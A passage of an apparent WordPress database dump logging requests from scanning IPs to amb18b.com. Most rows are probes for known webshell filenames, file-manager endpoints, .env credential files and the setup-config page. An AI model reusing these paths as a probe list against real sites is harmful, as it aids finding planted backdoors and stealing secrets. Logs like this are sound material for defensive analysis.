18:00:31','2025-10-30 18:00:31'),(2668,'https://amb18b.com/wp-admin/images/wp-ksv1i.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:32','2025-10-30 18:00:32'),(2669,'https://amb18b.com/wp-includes/js/crop/zmFM.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:34','2025-10-30 18:00:34'),(2670,'https://amb18b.com/.well-known/acme-challenge/admin.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:36','2025-10-30 18:00:36'),(2671,'https://amb18b.com/wp-includes/0.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:38','2025-10-30 18:00:38'),(2672,'https://amb18b.com/plugins/Cache/footer.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:40','2025-10-30 18:00:40'),(2673,'https://amb18b.com/wp-includes/style-engine/about.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:41','2025-10-30 18:00:41'),(2674,'https://amb18b.com/404.php?fm=true','20.234.109.99','Direct Access',1,'2025-10-30 18:00:44','2025-10-30 18:00:44'),(2675,'https://amb18b.com/i1.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:46','2025-10-30 18:00:46'),(2676,'https://amb18b.com/link.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:50','2025-10-30 18:00:50'),(2677,'https://amb18b.com/images/m.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:53','2025-10-30 18:00:53'),(2678,'https://amb18b.com/wp-admin/js/themes.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:55','2025-10-30 18:00:55'),(2679,'https://amb18b.com/xx.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:57','2025-10-30 18:00:57'),(2680,'https://amb18b.com/mail.php?','20.234.109.99','Direct Access',1,'2025-10-30 18:00:59','2025-10-30 18:00:59'),(2681,'https://amb18b.com/.well-known/fm.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:00','2025-10-30 18:01:00'),(2682,'https://amb18b.com/17.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:03','2025-10-30 18:01:03'),(2683,'https://amb18b.com/0.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:05','2025-10-30 18:01:05'),(2684,'https://amb18b.com/wp-admin/maint/Mailer.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:07','2025-10-30 18:01:07'),(2685,'https://amb18b.com/wp-configs.php?','20.234.109.99','Direct Access',1,'2025-10-30 18:01:08','2025-10-30 18:01:08'),(2686,'https://amb18b.com/wp-includes/js/codemirror/index.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:10','2025-10-30 18:01:10'),(2687,'https://amb18b.com/click.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:13','2025-10-30 18:01:13'),(2688,'https://amb18b.com/install.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:15','2025-10-30 18:01:15'),(2689,'https://amb18b.com/10.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:17','2025-10-30 18:01:17'),(2690,'https://amb18b.com/goat1.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:18','2025-10-30 18:01:18'),(2691,'https://amb18b.com/yu.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:20','2025-10-30 18:01:20'),(2692,'https://amb18b.com/images/Marvins.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:22','2025-10-30 18:01:22'),(2693,'https://amb18b.com/.well-known/admin.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:24','2025-10-30 18:01:24'),(2694,'https://amb18b.com/124.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:26','2025-10-30 18:01:26'),(2695,'https://amb18b.com/wp-admin/maint/index.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:28','2025-10-30 18:01:28'),(2696,'https://amb18b.com/q.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:29','2025-10-30 18:01:29'),(2697,'https://amb18b.com/123.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:31','2025-10-30 18:01:31'),(2698,'https://amb18b.com/aa.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:35','2025-10-30 18:01:35'),(2699,'https://amb18b.com/uploads/multi.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:37','2025-10-30 18:01:37'),(2700,'https://amb18b.com/3.php?p=','20.234.109.99','Direct Access',1,'2025-10-30 18:01:39','2025-10-30 18:01:39'),(2701,'https://amb18b.com/admin/uploads/images/autoload_classmap.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:41','2025-10-30 18:01:41'),(2702,'https://amb18b.com/sk.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:42','2025-10-30 18:01:42'),(2703,'https://amb18b.com/wp-crom.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:44','2025-10-30 18:01:44'),(2704,'https://amb18b.com/max.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:46','2025-10-30 18:01:46'),(2705,'https://amb18b.com/1100.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:49','2025-10-30 18:01:49'),(2706,'https://amb18b.com/.well-known/gecko-litespeed.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:53','2025-10-30 18:01:53'),(2707,'https://amb18b.com/lock360.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:55','2025-10-30 18:01:55'),(2708,'https://amb18b.com/up.php?x=','20.234.109.99','Direct Access',1,'2025-10-30 18:01:57','2025-10-30 18:01:57'),(2709,'https://amb18b.com/sim.php','20.234.109.99','Direct Access',1,'2025-10-30 18:01:59','2025-10-30 18:01:59'),(2710,'https://amb18b.com/ioxi-o.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:01','2025-10-30 18:02:01'),(2711,'https://amb18b.com/oo.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:03','2025-10-30 18:02:03'),(2712,'https://amb18b.com/alfanew.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:05','2025-10-30 18:02:05'),(2713,'https://amb18b.com/wp-includes/js/codemirror/about.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:06','2025-10-30 18:02:06'),(2714,'https://amb18b.com/themes/twentytwentytwo/index.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:08','2025-10-30 18:02:08'),(2715,'https://amb18b.com/ll.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:10','2025-10-30 18:02:10'),(2716,'https://amb18b.com/wp-includes/wp-class.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:12','2025-10-30 18:02:12'),(2717,'https://amb18b.com/ee.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:14','2025-10-30 18:02:14'),(2718,'https://amb18b.com/wi.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:18','2025-10-30 18:02:18'),(2719,'https://amb18b.com/mms.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:20','2025-10-30 18:02:20'),(2720,'https://amb18b.com/wp-includes/Requests/about.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:22','2025-10-30 18:02:22'),(2721,'https://amb18b.com/v4.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:24','2025-10-30 18:02:24'),(2722,'https://amb18b.com/wp-mn.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:26','2025-10-30 18:02:26'),(2723,'https://amb18b.com/222.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:28','2025-10-30 18:02:28'),(2724,'https://amb18b.com/ALFA_DATA/index.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:30','2025-10-30 18:02:30'),(2725,'https://amb18b.com/lock360.php?p=','20.234.109.99','Direct Access',1,'2025-10-30 18:02:32','2025-10-30 18:02:32'),(2726,'https://amb18b.com/wp-includes/autoload_classmap.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:35','2025-10-30 18:02:35'),(2727,'https://amb18b.com/po.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:37','2025-10-30 18:02:37'),(2728,'https://amb18b.com/zews.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:40','2025-10-30 18:02:40'),(2729,'https://amb18b.com/wp-admin/wp-conflg.php?p=','20.234.109.99','Direct Access',1,'2025-10-30 18:02:42','2025-10-30 18:02:42'),(2730,'https://amb18b.com/usage-file.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:44','2025-10-30 18:02:44'),(2731,'https://amb18b.com/Js.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:50','2025-10-30 18:02:50'),(2732,'https://amb18b.com/menu.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:54','2025-10-30 18:02:54'),(2733,'https://amb18b.com/bs1.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:55','2025-10-30 18:02:55'),(2734,'https://amb18b.com/build.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:57','2025-10-30 18:02:57'),(2735,'https://amb18b.com/ab.php','20.234.109.99','Direct Access',1,'2025-10-30 18:02:59','2025-10-30 18:02:59'),(2736,'https://amb18b.com/ahax.php','20.234.109.99','Direct Access',1,'2025-10-30 18:03:01','2025-10-30 18:03:01'),(2737,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','4.217.235.135','Invalid Referrer',1,'2025-10-31 04:01:04','2025-10-31 04:01:04'),(2738,'https://amb18b.com/wp-plain.php','4.217.235.135','Invalid Referrer',1,'2025-10-31 04:01:04','2025-10-31 04:01:04'),(2739,'https://amb18b.com/','4.217.235.135','Invalid Referrer',2,'2025-10-31 04:01:10','2025-10-31 04:01:09'),(2740,'https://amb18b.com/alfacgiapi/perl.alfa','4.217.235.135','Invalid Referrer',1,'2025-10-31 04:01:11','2025-10-31 04:01:11'),(2741,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','4.217.235.135','Direct Access',1,'2025-10-31 04:01:12','2025-10-31 04:01:12'),(2742,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','4.217.235.135','Direct Access',1,'2025-10-31 04:01:15','2025-10-31 04:01:15'),(2743,'https://amb18b.com/jqueryfileupload/server/php/index.php?file=tf2rghf.jpg','37.49.148.167','Direct Access',1,'2025-10-31 05:53:10','2025-10-31 05:53:10'),(2744,'https://amb18b.com/wp-admin/css/','45.94.31.174','Invalid Referrer',1,'2025-10-31 08:11:14','2025-10-31 08:11:14'),(2745,'https://amb18b.com/api/get_nonce/?controller=user&method=register&insecure=cool','2406:da1c:8ee:a000:64fb:f29c:56d6:d8af','Direct Access',1,'2025-10-31 10:10:17','2025-10-31 10:10:17'),(2746,'https://amb18b.com/mah.php','94.242.147.143','Direct Access',1,'2025-10-31 13:07:34','2025-10-31 13:07:34'),(2747,'https://amb18b.com/goods.php','94.242.147.143','Direct Access',1,'2025-10-31 13:07:34','2025-10-31 13:07:34'),(2748,'https://amb18b.com/chosen.php','94.242.147.143','Direct Access',1,'2025-10-31 13:07:35','2025-10-31 13:07:35'),(2749,'https://amb18b.com/CLA.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:09','2025-10-31 13:53:09'),(2750,'https://amb18b.com/aa.php','128.24.107.65','Direct Access',2,'2025-10-31 13:53:16','2025-10-31 13:53:10'),(2751,'https://amb18b.com/gfile.php','128.24.107.65','Direct Access',2,'2025-10-31 13:53:18','2025-10-31 13:53:12'),(2752,'https://amb18b.com/nc4.php','128.24.107.65','Direct Access',2,'2025-10-31 13:53:20','2025-10-31 13:53:14'),(2753,'https://amb18b.com/orm.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:22','2025-10-31 13:53:22'),(2754,'https://amb18b.com/gmo.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:24','2025-10-31 13:53:24'),(2755,'https://amb18b.com/akcc.php','128.24.107.65','Direct Access',2,'2025-10-31 13:54:16','2025-10-31 13:53:27'),(2756,'https://amb18b.com/nx.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:29','2025-10-31 13:53:29'),(2757,'https://amb18b.com/php.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:31','2025-10-31 13:53:31'),(2758,'https://amb18b.com/sx21_1.php','128.24.107.65','Direct Access',2,'2025-10-31 13:54:12','2025-10-31 13:53:32'),(2759,'https://amb18b.com/bluejackets.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:35','2025-10-31 13:53:35'),(2760,'https://amb18b.com/file17.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:36','2025-10-31 13:53:36'),(2761,'https://amb18b.com/pop.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:38','2025-10-31 13:53:38'),(2762,'https://amb18b.com/nx9.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:40','2025-10-31 13:53:40'),(2763,'https://amb18b.com/kwm4.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:42','2025-10-31 13:53:42'),(2764,'https://amb18b.com/ea3f.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:44','2025-10-31 13:53:44'),(2765,'https://amb18b.com/akp.php','128.24.107.65','Direct Access',2,'2025-10-31 13:55:09','2025-10-31 13:53:46'),(2766,'https://amb18b.com/xp.php','128.24.107.65','Direct Access',3,'2025-10-31 13:54:30','2025-10-31 13:53:48'),(2767,'https://amb18b.com/cwsd.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:50','2025-10-31 13:53:50'),(2768,'https://amb18b.com/1aa.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:52','2025-10-31 13:53:52'),(2769,'https://amb18b.com/litanies.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:54','2025-10-31 13:53:54'),(2770,'https://amb18b.com/asasx.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:56','2025-10-31 13:53:56'),(2771,'https://amb18b.com/just2.php','128.24.107.65','Direct Access',1,'2025-10-31 13:53:58','2025-10-31 13:53:58'),(2772,'https://amb18b.com/classwithtostring.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:00','2025-10-31 13:54:00'),(2773,'https://amb18b.com/j.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:02','2025-10-31 13:54:02'),(2774,'https://amb18b.com/g.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:04','2025-10-31 13:54:04'),(2775,'https://amb18b.com/ex.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:06','2025-10-31 13:54:06'),(2776,'https://amb18b.com/1.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:08','2025-10-31 13:54:08'),(2777,'https://amb18b.com/s.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:10','2025-10-31 13:54:10'),(2778,'https://amb18b.com/let.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:14','2025-10-31 13:54:14'),(2779,'https://amb18b.com/amphicyon.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:18','2025-10-31 13:54:18'),(2780,'https://amb18b.com/k.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:20','2025-10-31 13:54:20'),(2781,'https://amb18b.com/sec.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:22','2025-10-31 13:54:22'),(2782,'https://amb18b.com/ext.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:26','2025-10-31 13:54:26'),(2783,'https://amb18b.com/0x.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:28','2025-10-31 13:54:28'),(2784,'https://amb18b.com/file.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:33','2025-10-31 13:54:33'),(2785,'https://amb18b.com/themes.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:34','2025-10-31 13:54:34'),(2786,'https://amb18b.com/403.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:36','2025-10-31 13:54:36'),(2787,'https://amb18b.com/buy.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:38','2025-10-31 13:54:38'),(2788,'https://amb18b.com/css/index.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:40','2025-10-31 13:54:40'),(2789,'https://amb18b.com/about.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:42','2025-10-31 13:54:42'),(2790,'https://amb18b.com/readme.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:44','2025-10-31 13:54:44'),(2791,'https://amb18b.com/ad.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:46','2025-10-31 13:54:46'),(2792,'https://amb18b.com/np.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:48','2025-10-31 13:54:48'),(2793,'https://amb18b.com/good.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:50','2025-10-31 13:54:50'),(2794,'https://amb18b.com/test.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:52','2025-10-31 13:54:52'),(2795,'https://amb18b.com/z.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:54','2025-10-31 13:54:54'),(2796,'https://amb18b.com/aw.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:56','2025-10-31 13:54:56'),(2797,'https://amb18b.com/ay.php','128.24.107.65','Direct Access',1,'2025-10-31 13:54:58','2025-10-31 13:54:58'),(2798,'https://amb18b.com/mek.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:01','2025-10-31 13:55:01'),(2799,'https://amb18b.com/zse.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:03','2025-10-31 13:55:03'),(2800,'https://amb18b.com/wsa.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:05','2025-10-31 13:55:05'),(2801,'https://amb18b.com/elp.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:07','2025-10-31 13:55:07'),(2802,'https://amb18b.com/dlex.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:11','2025-10-31 13:55:11'),(2803,'https://amb18b.com/zwso.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:14','2025-10-31 13:55:14'),(2804,'https://amb18b.com/acp.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:16','2025-10-31 13:55:16'),(2805,'https://amb18b.com/bolt.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:17','2025-10-31 13:55:17'),(2806,'https://amb18b.com/pepe.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:19','2025-10-31 13:55:19'),(2807,'https://amb18b.com/alfa.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:21','2025-10-31 13:55:21'),(2808,'https://amb18b.com/natural.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:23','2025-10-31 13:55:23'),(2809,'https://amb18b.com/law.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:25','2025-10-31 13:55:25'),(2810,'https://amb18b.com/yca.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:28','2025-10-31 13:55:28'),(2811,'https://amb18b.com/wsad.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:30','2025-10-31 13:55:30'),(2812,'https://amb18b.com/ot.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:32','2025-10-31 13:55:32'),(2813,'https://amb18b.com/wp-includes/fonts/themes.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:34','2025-10-31 13:55:34'),(2814,'https://amb18b.com/xpw.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:38','2025-10-31 13:55:38'),(2815,'https://amb18b.com/geger.php','128.24.107.65','Direct Access',1,'2025-10-31 13:55:40','2025-10-31 13:55:40'),(2816,'https://amb18b.com/tiny.php','85.198.105.57','Direct Access',1,'2025-10-31 14:48:43','2025-10-31 14:48:43'),(2817,'https://amb18b.com/tiny.php','91.236.143.69','Direct Access',1,'2025-10-31 14:50:11','2025-10-31 14:50:11'),(2818,'https://amb18b.com/CLA.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:09','2025-10-31 16:03:09'),(2819,'https://amb18b.com/aa.php','128.24.107.65','Direct Access',2,'2025-10-31 16:03:17','2025-10-31 16:03:11'),(2820,'https://amb18b.com/gfile.php','128.24.107.65','Direct Access',2,'2025-10-31 16:03:19','2025-10-31 16:03:13'),(2821,'https://amb18b.com/nc4.php','128.24.107.65','Direct Access',2,'2025-10-31 16:03:21','2025-10-31 16:03:16'),(2822,'https://amb18b.com/orm.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:23','2025-10-31 16:03:23'),(2823,'https://amb18b.com/gmo.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:25','2025-10-31 16:03:25'),(2824,'https://amb18b.com/akcc.php','128.24.107.65','Direct Access',2,'2025-10-31 16:04:16','2025-10-31 16:03:27'),(2825,'https://amb18b.com/nx.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:29','2025-10-31 16:03:29'),(2826,'https://amb18b.com/php.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:31','2025-10-31 16:03:31'),(2827,'https://amb18b.com/sx21_1.php','128.24.107.65','Direct Access',2,'2025-10-31 16:04:12','2025-10-31 16:03:33'),(2828,'https://amb18b.com/bluejackets.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:35','2025-10-31 16:03:35'),(2829,'https://amb18b.com/file17.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:37','2025-10-31 16:03:37'),(2830,'https://amb18b.com/pop.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:39','2025-10-31 16:03:39'),(2831,'https://amb18b.com/nx9.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:41','2025-10-31 16:03:41'),(2832,'https://amb18b.com/kwm4.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:43','2025-10-31 16:03:43'),(2833,'https://amb18b.com/ea3f.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:45','2025-10-31 16:03:45'),(2834,'https://amb18b.com/akp.php','128.24.107.65','Direct Access',2,'2025-10-31 16:05:04','2025-10-31 16:03:47'),(2835,'https://amb18b.com/xp.php','128.24.107.65','Direct Access',3,'2025-10-31 16:04:29','2025-10-31 16:03:49'),(2836,'https://amb18b.com/cwsd.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:50','2025-10-31 16:03:50'),(2837,'https://amb18b.com/1aa.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:52','2025-10-31 16:03:52'),(2838,'https://amb18b.com/litanies.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:55','2025-10-31 16:03:55'),(2839,'https://amb18b.com/asasx.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:56','2025-10-31 16:03:56'),(2840,'https://amb18b.com/just2.php','128.24.107.65','Direct Access',1,'2025-10-31 16:03:58','2025-10-31 16:03:58'),(2841,'https://amb18b.com/classwithtostring.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:00','2025-10-31 16:04:00'),(2842,'https://amb18b.com/j.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:02','2025-10-31 16:04:02'),(2843,'https://amb18b.com/g.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:04','2025-10-31 16:04:04'),(2844,'https://amb18b.com/ex.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:06','2025-10-31 16:04:06'),(2845,'https://amb18b.com/1.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:08','2025-10-31 16:04:08'),(2846,'https://amb18b.com/s.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:09','2025-10-31 16:04:09'),(2847,'https://amb18b.com/let.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:14','2025-10-31 16:04:14'),(2848,'https://amb18b.com/amphicyon.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:18','2025-10-31 16:04:18'),(2849,'https://amb18b.com/k.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:20','2025-10-31 16:04:20'),(2850,'https://amb18b.com/sec.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:22','2025-10-31 16:04:22'),(2851,'https://amb18b.com/ext.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:25','2025-10-31 16:04:25'),(2852,'https://amb18b.com/0x.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:27','2025-10-31 16:04:27'),(2853,'https://amb18b.com/file.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:31','2025-10-31 16:04:31'),(2854,'https://amb18b.com/themes.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:33','2025-10-31 16:04:33'),(2855,'https://amb18b.com/403.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:35','2025-10-31 16:04:35'),(2856,'https://amb18b.com/buy.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:37','2025-10-31 16:04:37'),(2857,'https://amb18b.com/css/index.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:38','2025-10-31 16:04:38'),(2858,'https://amb18b.com/about.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:40','2025-10-31 16:04:40'),(2859,'https://amb18b.com/readme.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:42','2025-10-31 16:04:42'),(2860,'https://amb18b.com/ad.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:44','2025-10-31 16:04:44'),(2861,'https://amb18b.com/np.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:46','2025-10-31 16:04:46'),(2862,'https://amb18b.com/good.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:47','2025-10-31 16:04:47'),(2863,'https://amb18b.com/test.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:49','2025-10-31 16:04:49'),(2864,'https://amb18b.com/z.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:51','2025-10-31 16:04:51'),(2865,'https://amb18b.com/aw.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:53','2025-10-31 16:04:53'),(2866,'https://amb18b.com/ay.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:55','2025-10-31 16:04:55'),(2867,'https://amb18b.com/mek.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:56','2025-10-31 16:04:56'),(2868,'https://amb18b.com/zse.php','128.24.107.65','Direct Access',1,'2025-10-31 16:04:58','2025-10-31 16:04:58'),(2869,'https://amb18b.com/wsa.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:01','2025-10-31 16:05:01'),(2870,'https://amb18b.com/elp.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:02','2025-10-31 16:05:02'),(2871,'https://amb18b.com/dlex.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:06','2025-10-31 16:05:06'),(2872,'https://amb18b.com/zwso.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:08','2025-10-31 16:05:08'),(2873,'https://amb18b.com/acp.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:10','2025-10-31 16:05:10'),(2874,'https://amb18b.com/bolt.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:12','2025-10-31 16:05:12'),(2875,'https://amb18b.com/pepe.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:14','2025-10-31 16:05:14'),(2876,'https://amb18b.com/alfa.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:16','2025-10-31 16:05:16'),(2877,'https://amb18b.com/natural.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:17','2025-10-31 16:05:17'),(2878,'https://amb18b.com/law.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:19','2025-10-31 16:05:19'),(2879,'https://amb18b.com/yca.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:21','2025-10-31 16:05:21'),(2880,'https://amb18b.com/wsad.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:23','2025-10-31 16:05:23'),(2881,'https://amb18b.com/ot.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:24','2025-10-31 16:05:24'),(2882,'https://amb18b.com/wp-includes/fonts/themes.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:26','2025-10-31 16:05:26'),(2883,'https://amb18b.com/xpw.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:30','2025-10-31 16:05:30'),(2884,'https://amb18b.com/geger.php','128.24.107.65','Direct Access',1,'2025-10-31 16:05:33','2025-10-31 16:05:33'),(2885,'https://amb18b.com/cms/','136.117.160.100','Direct Access',1,'2025-10-31 17:46:33','2025-10-31 17:46:33'),(2886,'https://amb18b.com/register','103.186.30.230','Direct Access',1,'2025-10-31 22:19:46','2025-10-31 22:19:46'),(2887,'https://amb18b.com/.env','103.186.30.230','Direct Access',1,'2025-10-31 22:19:54','2025-10-31 22:19:54'),(2888,'https://amb18b.com/sites/all/libraries/elfinder/connectors/php/connector.php','37.49.148.167','Direct Access',1,'2025-11-01 09:51:57','2025-11-01 09:51:57'),(2889,'https://amb18b.com/.env.save','103.8.27.73','Direct Access',1,'2025-11-01 12:56:34','2025-11-01 12:56:34'),(2890,'https://amb18b.com/public/.env','103.8.27.73','Direct Access',1,'2025-11-01 12:56:34','2025-11-01 12:56:34'),(2891,'https://amb18b.com/app/.env','103.8.27.73','Direct Access',1,'2025-11-01 12:56:34','2025-11-01 12:56:34'),(2892,'https://amb18b.com/.env','103.8.27.73','Direct Access',1,'2025-11-01 12:56:35','2025-11-01 12:56:35'),(2893,'https://amb18b.com/.env.production','103.8.27.73','Direct Access',1,'2025-11-01 12:56:35','2025-11-01 12:56:35'),(2894,'https://amb18b.com/api/.env','103.8.27.73','Direct Access',1,'2025-11-01 12:56:35','2025-11-01 12:56:35'),(2895,'https://amb18b.com/core/.env','103.8.27.73','Direct Access',1,'2025-11-01 12:56:35','2025-11-01 12:56:35'),(2896,'https://amb18b.com/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:37','2025-11-01 13:08:37'),(2897,'https://amb18b.com/wordpress/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct 